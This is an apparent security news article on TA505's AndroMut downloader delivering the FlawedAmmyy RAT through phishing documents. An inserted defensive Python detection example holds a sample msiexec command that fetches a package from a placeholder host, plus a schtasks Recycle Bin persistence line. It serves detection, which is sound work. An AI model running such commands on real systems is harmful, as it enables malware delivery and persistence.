
TA505 cybergang debuts 'AndroMut' downloader to deliver FlawedAmmyy RAT globally

The cybercriminal group TA505 appears to have launched two malware campaigns last June, delivering the FlawedAmmyy RAT to victims in multiple countries using the newly created downloader program AndroMut.

Both campaigns infected victims using phishing emails with links for downloading Microsoft Word and Excel files, according to a July 2 blog post by Proofpoint. If enabled, the malicious macros embedded within those files would execute an Msiexec command that downloaded and executed either AndroMut or the FlawedAmmyy loader. Either way, the loader would deliver the FlawedAmmyy RAT.

One of the campaigns targeted South Koreans, while the other sought out financial institutions in Singapore, the United Arab Emirates and the U.S. In both cases, the subject lines of the phishing emails used financial-document terms such as "invoice," "remittance" or "estimate."

Proofpoint reports that AndroMut is written in C++, communicates with its C2 server via HTTP POST requests, and seems to share certain code and behavior with the Andromeda and QtLoader malware (although the researchers expressed low confidence in these overlaps).

AndroMut also features multiple anti-analysis checks, including looking for sandboxing, mouse movement, the Wine emulator and debuggers. It establishes persistence in one of two ways, depending on user privileges: "by either scheduling a task that executes a created LNK file in the Recycle Bin or via the 'Registry run' method," Proofpoint explains.
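A defender-side illustration of the chain the article describes, added here as an example that is not from Proofpoint's post or SC Media's reporting: three simple rules run over constructed Sysmon-style records (the file paths, SID, task name and the example.invalid URL are placeholders) flag an Office process launching msiexec, a scheduled task whose action is a .lnk under $Recycle.Bin, and a Run-key value pointing into a user profile.

```python
import ntpath
import re

# Constructed Sysmon-style records (event 1 = process create, 13 = registry value set).
# Every value is made up for illustration; none is captured telemetry.
EVENTS = [
    {"id": 1, "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /q /i http://example.invalid/doc.msi"},
    {"id": 1, "parent": r"C:\Users\alice\AppData\Local\Temp\dl.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc minute /mo 5 /tn Update /tr "C:\$Recycle.Bin\S-1-5-21-1-2-3-1001\update.lnk"'},
    {"id": 13, "image": r"C:\Users\alice\AppData\Local\Temp\dl.exe",
     "target": r"HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Run\Update",
     "details": r"C:\Users\alice\AppData\Local\Temp\dl.exe"},
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
LNK_IN_RECYCLE = re.compile(r"\$recycle\.bin\\.*\.lnk", re.IGNORECASE)
RUN_KEY = re.compile(r"\\currentversion\\run\\", re.IGNORECASE)


def _base(path):
    return ntpath.basename(path).lower()


def office_spawns_msiexec(ev):
    """Macro-driven delivery step: an Office parent starting msiexec."""
    return ev["id"] == 1 and _base(ev["image"]) == "msiexec.exe" and _base(ev["parent"]) in OFFICE_APPS


def schtasks_lnk_in_recycle_bin(ev):
    """Scheduled task whose action is a .lnk inside $Recycle.Bin (first persistence method quoted above)."""
    return (ev["id"] == 1 and _base(ev["image"]) == "schtasks.exe"
            and "/create" in ev["cmdline"].lower() and LNK_IN_RECYCLE.search(ev["cmdline"]) is not None)


def run_key_persistence(ev):
    """Run-key value whose data points into a user-writable profile path (the 'Registry run' method)."""
    return ev["id"] == 13 and RUN_KEY.search(ev["target"]) is not None and "\\appdata\\" in ev["details"].lower()


RULES = [office_spawns_msiexec, schtasks_lnk_in_recycle_bin, run_key_persistence]


def detect(events):
    """Return (event index, rule name) for every record matching a rule; benign records yield nothing."""
    return [(i, rule.__name__) for i, ev in enumerate(events) for rule in RULES if rule(ev)]


if __name__ == "__main__":
    for idx, name in detect(EVENTS):
        print(f"event {idx}: {name}")
```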

"With this new June 2019 push, commercial banking verticals in the United States, UAE, and Singapore appear to be the primary targets as part of TA505's usual 'follow the money' behavioral pattern," the Proofpoint blog post concludes. "The new AndroMut downloader, when combined with the FlawedAmmyy RAT as its payload, appears to be TA505's new pet for the summer of 2019."


Bradley Barth

As director of multimedia content strategy at CyberRisk Alliance, Bradley Barth develops content for online conferences, webcasts, podcasts and video/multimedia projects — often serving as moderator or host. For nearly six years, he wrote and reported for SC Media as deputy editor and, before that, senior reporter. He was previously a program executive with the tech-focused PR firm Voxus. Past journalistic experience includes stints as business editor at Executive Technology, a staff writer at New York Sportscene and a freelance journalist covering travel and entertainment. In his spare time, Bradley also writes screenplays.
